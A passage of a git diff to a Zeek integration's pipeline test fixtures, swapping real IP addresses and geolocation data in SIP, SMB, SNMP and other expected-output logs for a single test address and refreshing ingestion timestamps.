"lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.195", + "address": "89.160.20.156", "port": 5060, - "ip": "200.57.7.195" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CJZDWgixtwqXctWEg", "sip": { "request": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;rport" + "SIP/2.0/UDP 89.160.20.156:5061;rport" ], "from": "Ivan \u003csip:Ivan@Verso.com\u003e", "to": "Ivan \u003csip:Ivan@Verso.com\u003e", @@ -260,7 +262,7 @@ }, "response": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061" + "SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061" ], "from": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", "to": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", @@ -278,26 +280,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.205", + "address": "89.160.20.156", "port": 5061, - "ip": "200.57.7.205" + "ip": "89.160.20.156" }, "url": { "full": "sip:Verso.com" @@ -307,7 +309,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" }, "@timestamp": "2005-01-14T17:58:07.022Z", @@ -316,13 +318,12 @@ }, "related": { "ip": [ - "200.57.7.205", - "200.57.7.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589909800Z", - "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041832Z", + "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "REGISTER", @@ -348,7 +349,7 @@ "sip": { "request": { "path": [ - "SIP/2.0/UDP 193.107.216.13:5083" + "SIP/2.0/UDP 89.160.20.156:5083" ], "from": "\"sipvicious\"\u003csip:90501@1.1.1.1\u003e", "to": "\"sipvicious\"\u003csip:90501@1.1.1.1\u003e", @@ -361,7 +362,7 @@ "response": { "path": [] }, - "uri": "sip:100@35.198.74.222", + "uri": "sip:100@89.160.20.156", "transaction_depth": 0, "user_agent": "friendly-scanner", "call_id": "767538559354206383610151" @@ -370,32 +371,35 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Poland", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 21.0362, - "lat": 52.2394 - }, - "country_iso_code": "PL" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 24000, + "number": 29518, "organization": { - "name": "24.hk global BGP" + "name": "Bredband2 AB" } }, - "address": "193.107.216.13", + "address": "89.160.20.156", "port": 5083, - "ip": "193.107.216.13" + "ip": "89.160.20.156" }, "url": { - "full": "sip:100@35.198.74.222" + "full": "sip:100@89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { "protocol": "sip", - "community_id": "1:0yHuzsMc9NWnZAgB15XTv5hKFPI=", + "community_id": "1:eAmnybkUlcgqIMU6KMfWi3X/b84=", "transport": "udp" }, "@timestamp": "2021-03-30T15:50:16.928Z", @@ -404,13 +408,13 @@ }, "related": { "ip": [ - "193.107.216.13", + "89.160.20.156", "10.156.0.2" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589918Z", - "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"193.107.216.13\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@35.198.74.222\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 193.107.216.13:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041835200Z", + "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "OPTIONS", @@ -448,7 +452,7 @@ "response": { "path": [] }, - "uri": "sip:100@35.198.74.222", + "uri": "sip:100@89.160.20.156", "transaction_depth": 0, "user_agent": "friendly-scanner", "call_id": "35848812076538877174452" @@ -457,32 +461,35 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Germany", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 9.491, - "lat": 51.2993 - }, - "country_iso_code": "DE" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 40676, + "number": 29518, "organization": { - "name": "Psychz Networks" + "name": "Bredband2 AB" } }, - "address": "45.134.144.100", + "address": "89.160.20.156", "port": 5170, - "ip": "45.134.144.100" + "ip": "89.160.20.156" }, "url": { - "full": "sip:100@35.198.74.222" + "full": "sip:100@89.160.20.156" }, "tags": [ "preserve_original_event" ], "network": { "protocol": "sip", - "community_id": "1:CG92d5aAL3DgFhEJiDndd41USVA=", + "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", "transport": "udp" }, "@timestamp": "2021-03-30T15:58:43.416Z", @@ -491,13 +498,13 @@ }, "related": { "ip": [ - "45.134.144.100", + "89.160.20.156", "10.156.0.2" ] }, "event": { - "ingested": "2021-08-11T19:18:35.589926200Z", - "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"45.134.144.100\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@35.198.74.222\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041839500Z", + "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "OPTIONS", @@ -519,33 +526,33 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.195", + "address": "89.160.20.156", "port": 5060, - "ip": "200.57.7.195" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CJZDWgixtwqXctWEg", "sip": { "request": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;rport" + "SIP/2.0/UDP 89.160.20.156:5061;rport" ], "from": "Ivan \u003csip:Ivan@Verso.com\u003e", "to": "Ivan \u003csip:Ivan@Verso.com\u003e", @@ -557,7 +564,7 @@ }, "response": { "path": [ - "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061" + "SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061" ], "from": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", "to": "\"Ivan\" \u003csip:Ivan@Verso.com\u003e", @@ -575,26 +582,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "MX-CMX", - "city_name": "Mexico City", - "country_iso_code": "MX", - "country_name": "Mexico", - "region_name": "Mexico City", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -99.1438, - "lat": 19.4357 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 18734, + "number": 29518, "organization": { - "name": "Operbes, S.A. de C.V." + "name": "Bredband2 AB" } }, - "address": "200.57.7.205", + "address": "89.160.20.156", "port": 5061, - "ip": "200.57.7.205" + "ip": "89.160.20.156" }, "url": { "full": "sip:Verso.com" @@ -604,7 +611,7 @@ ], "network": { "protocol": "sip", - "community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" }, "@timestamp": "2005-01-14T17:58:07.022Z", @@ -613,16 +620,15 @@ }, "related": { "ip": [ - "200.57.7.205", - "200.57.7.195" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:35.589934400Z", - "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"200.57.7.205\",\"id.orig_p\":5061,\"id.resp_h\":\"200.57.7.195\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", + "ingested": "2021-12-09T13:51:09.041844400Z", + "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "REGISTER", diff --git a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json index 8f91345e97a..e9c2a3f4562 100644 --- a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json +++ b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json @@ -43,7 +43,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-08-11T19:18:36.646586300Z", + "ingested": "2021-12-09T13:51:10.088827400Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -126,7 +126,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:36.646597600Z", + "ingested": "2021-12-09T13:51:10.088835100Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json index bc81e2ee2a9..4c2a129efbb 100644 --- a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json +++ b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json @@ -54,7 +54,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:37.102680900Z", + "ingested": "2021-12-09T13:51:10.459184600Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -133,7 +133,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:37.102727600Z", + "ingested": "2021-12-09T13:51:10.459194Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json index d9caeedaf6e..a99565de49c 100644 --- a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json +++ b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-08-11T19:18:37.556241300Z", + "ingested": "2021-12-09T13:51:10.847414400Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:37.556249600Z", + "ingested": "2021-12-09T13:51:10.847422700Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json index 8795dd4c7ab..51a2cf90be5 100644 --- a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json +++ b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json @@ -47,7 +47,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:37.984614700Z", + "ingested": "2021-12-09T13:51:11.179554200Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -116,7 +116,7 @@ "established": true }, "event": { - "ingested": "2021-08-11T19:18:37.984628900Z", + "ingested": "2021-12-09T13:51:11.179563400Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log index 4ef105f119f..9e18e4a9e04 100644 --- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log +++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log @@ -1,3 +1,3 @@ {"ts":1543877948.916584,"uid":"CnKW1B4w9fpRa6Nkf2","id.orig_h":"192.168.1.2","id.orig_p":59696,"id.resp_h":"192.168.1.1","id.resp_p":161,"duration":7.849924,"version":"2c","community":"public","get_requests":0,"get_bulk_requests":0,"get_responses":8,"set_requests":0,"up_since":1543631204.766508} -{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"184.105.139.67","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} +{"ts":1617080496.400704,"uid":"CxtWIB4ECPW89F8mSi","id.orig_h":"89.160.20.156","id.orig_p":37533,"id.resp_h":"10.156.0.2","id.resp_p":161,"duration":0.0,"version":"2c","community":"public","get_requests":4,"get_bulk_requests":0,"get_responses":0,"set_requests":0} {"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/snmp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json index 6fb5289ecd8..a01d7381121 100644 --- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json +++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json @@ -39,7 +39,7 @@ "ip": "192.168.1.2" }, "event": { - "ingested": "2021-08-11T19:18:38.426521200Z", + "ingested": "2021-12-09T13:51:11.552302400Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -68,7 +68,7 @@ }, "related": { "ip": [ - "184.105.139.67", + "89.160.20.156", "10.156.0.2" ] }, @@ -95,27 +95,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 6939, + "number": 29518, "organization": { - "name": "Hurricane Electric LLC" + "name": "Bredband2 AB" } }, - "address": "184.105.139.67", + "address": "89.160.20.156", "port": 37533, - "ip": "184.105.139.67" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:38.426533800Z", - "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"184.105.139.67\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}", + "ingested": "2021-12-09T13:51:11.552374200Z", + "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CxtWIB4ECPW89F8mSi", @@ -132,7 +135,7 @@ ], "network": { "protocol": "snmp", - "community_id": "1:MUkMU0Syk5ccgUPSHnt5CrInr9E=", + "community_id": "1:CME095Bogwz14GC0LzmiGaWz0bA=", "transport": "udp" } }, @@ -191,7 +194,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:38.426541100Z", + "ingested": "2021-12-09T13:51:11.552380Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json index ea1ad61ff57..0a141e5257a 100644 --- a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json +++ b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json @@ -36,7 +36,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-08-11T19:18:38.923275100Z", + "ingested": "2021-12-09T13:51:12.003932500Z", "original": 